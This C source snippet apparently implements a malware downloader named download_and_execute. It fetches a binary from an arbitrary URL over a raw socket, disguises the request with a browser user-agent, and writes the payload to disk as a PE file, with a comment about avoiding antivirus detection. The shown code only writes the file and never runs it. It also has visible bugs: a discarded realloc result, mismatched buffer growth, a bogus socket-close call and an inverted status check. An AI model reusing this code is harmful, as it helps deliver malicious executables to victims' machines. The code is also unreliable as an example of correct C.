// Downloads and execute a given binary file from a given urlint download_and_

1. // Downloads and execute a given binary file from a given url
2. int download_and_execute(const char * path_to_write, const char * url, long filesize) {
3.  
4. char host[512];
5. char host_path[512];
6.  
7. char* t = strstr(url, "://");
8. strcpy(host, t + 3);
9.  
10.  
11. char* tt = strstr(host, "/");
12. if (!tt) return -1;
13. else {
14. strcpy(host_path, tt);
15. }
16.  
17. strcpy(tt, "\x00");
18.  
19. #ifdef _DEBUG
20. printf("HOST:%s\n", host);
21. printf("PATH:%s\n", host_path);
22. printf("Init...\n");
23. #endif
24. int __port = 80;
25.  
26. printf("Phase-2\n");
27.  
28. SOCKET host_server = INVALID_SOCKET;
29. printf("phase-3\n");
30. if (!socket_init_and_connect(&host_server, host, __port)) {
31. printf("Error socket_init_and_connect\n");
32. return -1;
33. }
34.  
35. printf("Phase-4\n");
36.  
37. if (host_server == INVALID_SOCKET || host_server == NULL) {
38. printf("Invalid socket..");
39. return -1;
40. }
41.  
42. printf("Phase-5\n");
43. // Form HTTP-request message.
44. // use browser-like UA to have less complications
45.  
46. char tmp_buff[512], http_request_buff[1024];
47.  
48. sprintf(tmp_buff, "GET %s HTTP/1.0\r\n", host_path);
49. strcpy(http_request_buff, tmp_buff);
50.  
51. sprintf(tmp_buff, "HOST: %s\r\n", host);
52. strcat(http_request_buff, tmp_buff);
53. strcat(http_request_buff, "Cache-Control: max-age=0\r\n");
54. strcat(http_request_buff, "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36\r\n" );
55.  
56. strcat(http_request_buff, "\r\n");
57.  
58. printf("HTTP-REQUEST-BUFF: \n%s\n", http_request_buff);
59.  
60. if (!sendall(host_server, http_request_buff, strlen(http_request_buff) * sizeof(char))) {
61. printf("Error sending request\n");
62. close_socket_connection(host_server);
63. return -1;
64. }
65.  
66. size_t http_response_size = (size_t)(filesize + 512);
67. char * http_response = malloc(http_response_size);
68. memset(http_response, 0, http_response_size);
69. printf("Reading response");
70. int total_recv = 0;
71. while (1) {
72. if (total_recv >= (int)(http_response_size) ) {
73. printf("Reallocating\n");
74. realloc(http_response, http_response_size + 64);
75. http_response_size += 512;
76. }
77. int r = recv(host_server, http_response+total_recv, 1, 0);
78. total_recv += r;
79. memset(http_response + total_recv, 0, 1);
80. if (r <= 0) {
81. printf("Finished??..");
82. break;
83. }
84.  
85. }
86.  
87. printf("HTTP-REPONSE:\n%s\n", http_response);
88. printf("Finished receiving...\n" );
89. // http_response now holds the http response data by the server
90. char* http_ok = strstr(http_response, "200 OK");
91. if ((http_ok != NULL) && (http_response - http_ok) > 10) {
92. free(http_response);
93. close_socket_connection(host_server);
94. return -1;
95. }
96.  
97. close_socket_connection("");
98. char* http_header_end = strstr(http_response, "\r\n\r\n");
99. if (http_header_end == NULL) {
100. free(http_response);
101. return -1;
102. }
103.  
104. char* exe_file_contents = http_header_end + 4;
105.  
106. // [!] Direct write to disc of a (valid) PE file might trigger AVs
107. FILE* file = fopen(path_to_write, "wb");
108. if (!file) {
109. return -1;
110. }
111.  
112. fwrite((void*)exe_file_contents, filesize, 1, file);
113. fclose(file);
114.  
115.  
116. return 1;
117. }